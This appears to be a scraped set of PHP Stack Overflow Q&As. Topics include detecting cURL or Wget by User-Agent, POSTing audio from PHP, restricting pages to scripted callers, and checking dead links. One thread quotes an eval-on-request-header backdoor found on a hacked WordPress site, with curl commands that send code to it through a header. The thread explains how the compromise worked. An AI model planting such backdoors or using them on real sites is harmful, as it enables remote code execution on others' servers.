Detect in PHP if page is accessed with cURL or Wget - php

I have a simple PHP script which shows some information to a user. I want to shorten this information as much as possible if the same page is requested with cURL or saved with Wget.
I saw several similar questions on Stack Overflow, but they have some extras like “I want to block cURL” or “redirect a form request if…”. The answers usually say that it is not possible to detect a cURL request reliably, since cURL lets the user change all request parameters and pretend to be a browser. That's okay for me; I don't want to block cURL, I want to offer an extra service for a generic cURL (and Wget) request.

Unless configured otherwise, cURL and Wget send a characteristic »User-Agent« string with their requests,
for example curl/7.47.0 or Wget/1.17.1 (linux-gnu). You can test this easily on https://requestb.in.
Server-side applications can read this string from the request headers. In PHP it's available in the $_SERVER['HTTP_USER_AGENT'] variable.
So to detect a cURL or Wget request and offer different content, you may use
<?php
// Catch cURL/Wget requests
if (isset($_SERVER['HTTP_USER_AGENT']) && preg_match('/^(curl|wget)/i', $_SERVER['HTTP_USER_AGENT'])) {
    echo 'Hi curl user!';
} else {
    echo 'Hello browser user!';
}
?>
In my app I detect the cURL request and then die() inside the if branch. If the request comes from a browser instead, the condition doesn't match and all the following PHP code is executed.
As said before, both cURL and Wget allow the user to set an arbitrary User Agent. But for the requested service, this solution is sufficient.
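A minimal sketch of that die() pattern, assuming the short output is a plain-text summary (the strings below are placeholders):
<?php
// Serve a short plain-text summary to command-line clients and stop.
if (isset($_SERVER['HTTP_USER_AGENT']) && preg_match('/^(curl|wget)/i', $_SERVER['HTTP_USER_AGENT'])) {
    header('Content-Type: text/plain; charset=utf-8');
    echo "Short summary for command-line clients\n"; // placeholder content
    die(); // nothing below this line runs for cURL/Wget
}
// ... regular HTML output for browsers follows here ...
?>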

Related

Can a hacker pass in parameters to $_SERVER?

So our website unfortunately got hacked.
They created a file in our wp-admin directory called wp-update.php containing this code:
<?php #eval($_SERVER['HTTP_4CD44849DA572F7C']); ?>
My question is how can the hacker pass in his script using $_SERVER?
Yes, a hacker can send data into $_SERVER: it contains the HTTP request headers (cf. the documentation), and with a simple curl command you can inject data:
curl -H '4CD44849DA572F7C: echo "hello from server";' http://example.com
Properties of the $_SERVER superglobal with names starting with HTTP_ are just representations of the HTTP request headers.
Since request headers are completely under the control of whoever is making the request, it is trivial to insert data there.
Any HTTP client will let the attacker specify whatever headers they like. An example in cURL's command line client would look like:
curl -H "4CD44849DA572F7C: code goes here" http://example.com/your-hacked.php

Callback function

So in JavaScript, I used to be able to have an HTTP request trigger a callback when AJAX sent a response back for the data I sent to the server, which effectively is a callback function. I'm now experimenting with the OAuth2 gem for Ruby, and I'm finding callbacks are not the same thing;
I have a web server and facebook app set up, and I have a small php script that writes the current URL (including the auth code, for example) to a file, no problem. All the settings in the facebook app are set up, and if I put this in the URL in the browser:
http://graph.facebook.com/oauth/authorize?client_id=[my_client_id]&redirect_uri=http://localhost/oauth/callback/index.php
It redirects successfully to that script, which then writes the authorization code to a file which I can then use to get the access token. Problem is that I can only do this process manually; using the Net::HTTP.get(URI(address)) command in ruby doesn't seem to initiate the php script.
Anyone have any ideas?
I have no idea why you posted your history with javascript ajax requests, as it has no bearing on your ruby script, which by the way doesn't even use a callback method/function. Using a callback function just means you are calling some function and passing it another function as an argument. When I started programming, the term callback function was very confusing to me, and in my opinion the term should be dropped from the lingo.
As for your ruby script, you need to use something like Firebug to look at the request headers that are being sent by your browser to the server when you manually enter the url in your browser. If you use those same headers in your ruby script, then it should work, e.g.:
req['header1'] = 'hello'
req['header2'] = '10'
or:
headers = {
  'header1' => 'hello',
  'header2' => '10',
  ...
}
req = Net::HTTP::Get.new(uri.request_uri, headers)
http = Net::HTTP.new(uri.host, uri.port)
resp = http.request(req)
It's possible that you have a cookie set in your browser, which your browser automatically adds to the request headers when it sends the request to the server. Your browser adds quite a few headers to the request--many of which will have no bearing on your problem. If you have the patience, you can try to figure out which header is causing your ruby script's request to malfunction.
Another option is to use the mechanize gem, which will automatically handle cookies and redirects for requests sent by ruby scripts:
http://docs.seattlerb.org/mechanize/GUIDE_rdoc.html
(Read the section Let's Fetch a Page; Don't use the line require 'rubygems' if you are using ruby 1.9+).

Posting FLAC to Google Voice Recognition API from PHP

I am quite experienced in PHP, but I've always had trouble with server-to-server connections like POST requests. I have a FLAC audio file that I need to post to Google's Speech Recognition API server, and I don't know how to "listen" to its response either. I would like a script like the following, assuming that this kind of function exists:
<?php
$fileId = $_GET['fileId'];
$filepath = $fileId . ".flac";
recognize($filepath);

function recognize($pathToFile) {
    // It's the following function that I'm looking for
    $response = $pathToFile->post("http://www.google.com/speech-api/v1/.....&client=chromium");
    // The $response would be the short JSON that Google feeds back.
    echo $response;
}
?>
EDIT
I've followed a tutorial to create a shell script that posts my FLAC file using Wget's --post-file option. I would like to post like this, but in PHP. Also, at the end of the command there is this > answer.ret part, so that Google's answer is written to that file. I was wondering if there is an alternative way to do this in PHP.
Here's the command line :
wget -q -U "Mozilla/5.0" --post-file audio1.flac --header="Content-Type: audio/x-flac; rate=16000" -O - "http://www.google.com/speech-api/v1/recognize?lang=fr-fr&client=chromium" > trancription1.ret
EDIT 2
I figured out how to do it, with hakre's answer, and baked up a little Gist for curious people. Here it is: https://gist.github.com/chlkbumper/4969389. Don't forget that the FLAC file must be sampled at 16 kHz (the rate=16000 in the request).
A POST request is just a standard HTTP request, just with the POST method specified. The rest of the HTTP Request and HTTP Response is pretty much the same.
You get the response of a request in the form of an HTTP response, by the way. This is normatively defined in RFC 2616 -- just consult that document and it explains everything.
A function in PHP to send HTTP requests is file_get_contents(); it returns the request's response. This works via the HTTP stream wrapper, which offers the context options you need to send a POST request (the default is GET). See the HTTP context options.
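A minimal sketch of that approach, reusing the endpoint, user agent and content type from the wget command above (URL and parameters are taken from the question, not verified here):
<?php
// POST a FLAC file with file_get_contents() and an HTTP stream context.
$url  = "http://www.google.com/speech-api/v1/recognize?lang=fr-fr&client=chromium"; // from the question
$flac = file_get_contents("audio1.flac"); // raw audio body

$context = stream_context_create(array(
    'http' => array(
        'method'  => 'POST',
        'header'  => "Content-Type: audio/x-flac; rate=16000\r\n" .
                     "User-Agent: Mozilla/5.0\r\n",
        'content' => $flac,
    ),
));

$response = file_get_contents($url, false, $context); // Google's JSON answer, or false on failure
echo $response;
?>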
Another popular way to send HTTP requests from PHP is the cURL extension.

check if page is viewed in browser? PHP

I was wondering if there is any way in PHP to check that a page is being run in a browser (by a human).
I've got a page that only needs to be accessed through a cURL request. So I don't want users snooping around on it.
any ideas?
thanks
EDIT:
Because this is one of those questions that are not easily found on the web, here's the solution I used:
I came up with an idea thanks to anthony-arnold. It's not very stable, but it should do for now.
I simply sent the user agent in my cURL request:
//made a new var with the user agent string.
$user_agent = "anything I want in here, which will be my user agent";
//added this line in the cURL request to send the useragent to the target page:
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
and then I simply wrote an if statement to handle it:
if ($_SERVER['HTTP_USER_AGENT'] == "my expected useragent - the string i previously placed into the $user_agent var.") {
    echo "the useragent is as expected, do whatever";
} else {
    echo "useragent is not as expected, bye now.";
    exit();
}
And that did the trick.
Check the User-Agent header or use the get_browser() function to check which browser is requesting your page. You could configure your web server to fail unless a specific user agent is specified. You can set the user agent in cURL using the --user-agent switch (see the man page).
Unfortunately, the user agent can be spoofed so you can never be absolutely sure that the one sent by the client is in fact correct.
There is a problem with this idea though. If it's on the public web, you have to expect that people might try to access it in any way! If the HTTP request is valid, your server will respond to it (under default configuration). If you really don't want it accessed by any method other than your prescribed cURL one, then you might need to invest in some further authentication/authorization methods (e.g. username/passphrase authentication via SSL).
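Since the User-Agent is trivially spoofed, a slightly stronger variant of the same idea is to send a shared secret in a custom header from your cURL script and compare it on the server with hash_equals(). This is only a sketch under the assumption that you control both ends; the header name and token are made up:
<?php
// Server side: only answer requests that carry the shared secret.
// The cURL client would set it with:
//   curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Internal-Token: my-long-random-secret'));
$sent = isset($_SERVER['HTTP_X_INTERNAL_TOKEN']) ? $_SERVER['HTTP_X_INTERNAL_TOKEN'] : '';

if (!hash_equals('my-long-random-secret', $sent)) { // constant-time comparison, PHP 5.6+
    http_response_code(403);
    exit('forbidden');
}

echo "hello trusted script";
?>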

How do I check for valid (not dead) links programmatically using PHP?

Given a list of urls, I would like to check that each url:
Returns a 200 OK status code
Returns a response within X amount of time
The end goal is a system that is capable of flagging urls as potentially broken so that an administrator can review them.
The script will be written in PHP and will most likely run on a daily basis via cron.
The script will be processing approximately 1000 urls at a go.
Question has two parts:
Are there any bigtime gotchas with an operation like this, what issues have you run into?
What is the best method for checking the status of a url in PHP considering both accuracy and performance?
Use the PHP cURL extension. Unlike fopen() it can also make HTTP HEAD requests, which are sufficient to check the availability of a URL and save you a ton of bandwidth, since you don't have to download the entire body of the page.
As a starting point you could use some function like this:
function is_available($url, $timeout = 30) {
    $ch = curl_init(); // get cURL handle

    // set cURL options
    $opts = array(
        CURLOPT_RETURNTRANSFER => true,      // do not output to browser
        CURLOPT_URL            => $url,      // set URL
        CURLOPT_NOBODY         => true,      // do a HEAD request only
        CURLOPT_TIMEOUT        => $timeout,  // set timeout
    );
    curl_setopt_array($ch, $opts);

    curl_exec($ch); // do it!
    $retval = curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200; // check if HTTP OK
    curl_close($ch); // close handle

    return $retval;
}
However, there's a ton of possible optimizations: You might want to re-use the cURL instance and, if checking more than one URL per host, even re-use the connection.
Oh, and this code checks strictly for HTTP response code 200. It does not follow redirects (302) -- but there is also a cURL option for that.
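For example, a variant of the function above that also accepts redirected-but-reachable URLs could simply enable CURLOPT_FOLLOWLOCATION and check the final status code (a sketch based on the same options):
function is_available_follow($url, $timeout = 30) {
    $ch = curl_init();
    curl_setopt_array($ch, array(
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_URL            => $url,
        CURLOPT_NOBODY         => true,     // HEAD request only
        CURLOPT_TIMEOUT        => $timeout,
        CURLOPT_FOLLOWLOCATION => true,     // follow 301/302 redirects
        CURLOPT_MAXREDIRS      => 5,        // but not forever
    ));
    curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); // status code of the final location
    curl_close($ch);
    return $code == 200;
}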
Look into cURL. There's a library for PHP.
There's also an executable version of cURL so you could even write the script in bash.
I actually wrote something in PHP that does this over a database of 5k+ URLs. I used the PEAR class HTTP_Request, which has a method called getResponseCode(). I just iterate over the URLs, passing them to getResponseCode and evaluate the response.
However, it doesn't work for FTP addresses, URLs that don't begin with http or https (unconfirmed, but I believe it's the case), or sites with invalid security certificates (it just returns 0). Also, a 0 is returned for server-not-found (there's no status code for that).
And it's probably easier than cURL as you include a few files and use a single function to get an integer code back.
fopen() supports http URIs.
If you need more flexibility (such as timeout), look into the cURL extension.
Seems like it might be a job for curl.
If you're not stuck on PHP, Perl's LWP might be an answer too.
You should also be aware of URLs returning 301 or 302 HTTP responses which redirect to another page. Generally this doesn't mean the link is invalid. For example, http://amazon.com returns 301 and redirects to http://www.amazon.com/.
Just returning a 200 response is not enough; many valid links will continue to return "200" after they change into porn / gambling portals when the former owner fails to renew.
Domain squatters typically ensure that every URL in their domains returns 200.
One potential problem you will undoubtedly run into is when the box this script is running on loses access to the Internet... you'll get 1000 false positives.
It would probably be better for your script to keep some type of history and only report a failure after 5 days of failure.
Also, the script should be self-checking in some way (like checking a known good web site [google?]) before continuing with the standard checks.
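A sanity check along those lines could reuse the is_available() function sketched earlier, before the batch starts (google.com as the reference site is just an example):
// Abort the cron run early if the checking box itself has no connectivity.
if (!is_available('http://www.google.com', 10)) {
    error_log('Link check skipped: reference site unreachable from this host.');
    exit(1);
}
// ... otherwise continue with the regular checks of the ~1000 URLs ...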
You only need a bash script to do this. Please check my answer on a similar post here. It is a one-liner that reuses HTTP connections to dramatically improve speed, retries n times for temporary errors and follows redirects.
